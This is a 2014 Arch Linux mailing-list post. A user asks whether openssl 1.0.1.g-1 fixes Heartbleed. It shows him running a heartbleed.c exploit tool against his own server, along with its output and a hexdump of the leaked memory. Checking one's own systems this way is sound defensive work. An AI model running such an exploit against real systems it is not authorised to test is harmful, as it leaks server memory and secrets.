[arch-general] Does openssl 1.0.1.g-1 close the heartbleed exploit?

David C. Rankin drankinatty at suddenlinkmail.com
Fri Apr 25 03:41:07 EDT 2014


Guys,

  I was testing my boxes after updating to openssl 1.0.1.g-1 with heartbleed.c
and I am still able to grab and decrypt ssl packets. The openssl security note
says 1.0.1.g is not effected by the bug, but I can still get a 64k chuck of data
back from my server using the heartbleed.c test. (if I'm reading the output
correctly) Am I may be doing something wrong? It is worth asking to be sure.

Archlinux server: phoinix - openssl 1.0.1.g-1

from client machine:

 $ ./heartbleed386 -s 192.168.7.16 -p 443 -f outph -t 1
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
[ =============================================================
[ connecting to 192.168.7.16 443/tcp
[ connected to 192.168.7.16 443/tcp
[ <3 <3 <3 heart bleed <3 <3 <3
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ heartbleed leaked length=65535
[ final record type=24, length=16384
[ wrote 16381 bytes of heap to file 'outph'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'outph'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'outph'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'outph'
[ heartbeat returned type=24 length=42
[ decrypting SSL packet
[ final record type=24, length=18
[ wrote 18 bytes of heap to file 'outph'
[ done.
 $ ls -al outph
-rwx------ 1 david david 65554 Apr 25 01:43 outph
 $ hexdump -C outph
00000000  52 74 59 da c6 d0 3a 5d  35 7e 33 fc 43 de e5 bb  |RtY...:]5~3.C...|
00000010  31 a2 ca c1 30 ff 5a e7  fd 28 52 4a 3c 18 51 4b  |1...0.Z..(RJ<.QK|
00000020  93 1e 2e 7b 41 58 e2 79  58 b8 26 f4 a0 d2 11 22  |...{AX.yX.&...."|
00000030  4d bc 62 54 7c 59 5c 63  11 42 fe 88 00 87 c0 32  |M.bT|Y\c.B.....2|
00000040  c0 2e c0 2a c0 26 c0 0f  c0 05 00 9d 00 3d 00 35  |...*.&.......=.5|
00000050  00 84 c0 12 c0 08 c0 1c  c0 1b 00 16 00 13 c0 0d  |................|
00000060  c0 03 00 0a c0 2f c0 2b  c0 27 c0 23 c0 13 c0 09  |...../.+.'.#....|
00000070  c0 1f c0 1e 00 a2 00 9e  00 67 00 40 00 33 00 32  |.........g. at .3.2|
00000080  00 9a 00 99 00 45 00 44  c0 31 c0 2d c0 29 c0 25  |.....E.D.1.-.).%|
00000090  c0 0e c0 04 00 9c 00 3c  00 2f 00 96 00 41 00 07  |.......<./...A..|
000000a0  c0 11 c0 07 c0 0c c0 02  00 05 00 04 00 15 00 12  |................|
000000b0  00 09 00 14 00 11 00 08  00 06 00 03 00 ff 02 01  |................|
000000c0  00 01 32 00 0b 00 04 03  00 01 02 00 0a 00 34 00  |..2...........4.|
000000d0  32 00 0e 00 0d 00 19 00  0b 00 0c 00 18 00 09 00  |2...............|
000000e0  0a 00 16 00 17 00 08 00  06 00 07 00 14 00 15 00  |................|
000000f0  04 00 05 00 12 00 13 00  01 00 02 00 03 00 0f 00  |................|
00000100  10 00 11 00 23 00 00 00  0d 00 20 00 1e 06 01 06  |....#..... .....|
00000110  02 06 03 05 01 05 02 05  03 04 01 04 02 04 03 03  |................|
00000120  01 03 02 03 03 02 01 02  02 02 03 00 0f 00 01 01  |................|
00000130  00 15 00 c1 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000001f0  00 00 00 00 00 5c c0 5d  c0 5e c0 5f c0 60 c0 61  |.....\.].^._.`.a|
00000200  c0 62 c0 63 c0 64 c0 65  c0 66 c0 67 c0 68 c0 69  |.b.c.d.e.f.g.h.i|
00000210  c0 6a c0 6b c0 6c c0 6d  c0 6e c0 6f c0 70 c0 71  |.j.k.l.m.n.o.p.q|
00000220  c0 72 c0 73 c0 74 c0 75  c0 76 c0 77 c0 78 c0 79  |.r.s.t.u.v.w.x.y|
00000230  c0 7a c0 7b c0 7c c0 7d  c0 7e c0 7f c0 80 c0 81  |.z.{.|.}.~......|
<snip - a lot more, with CN and other cert into visible>

  Can anyone confirm the openssl 1.0.1.g-1 fix against their arch server? The
information I get back in response to heartbleed has been decrypted -- that
leads me to believe the current openssl 1.0.1.g-1 may be suspect as well. Or am
I looking at this wrong?

  The ./heartbleed output that concerns me is:

[ heartbleed leaked length=65535

  However, each of the subsequent calls by ./heartbleed returned only ~16408,
which if I understand correctly is the max that should be returned after the fix:

[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'outph'

  Is this the expected fixed behavior, or does this still reflect a
vulnerability present? What say the experts? Thanks.

-- 
David C. Rankin, J.D.,P.E.


More information about the arch-general mailing list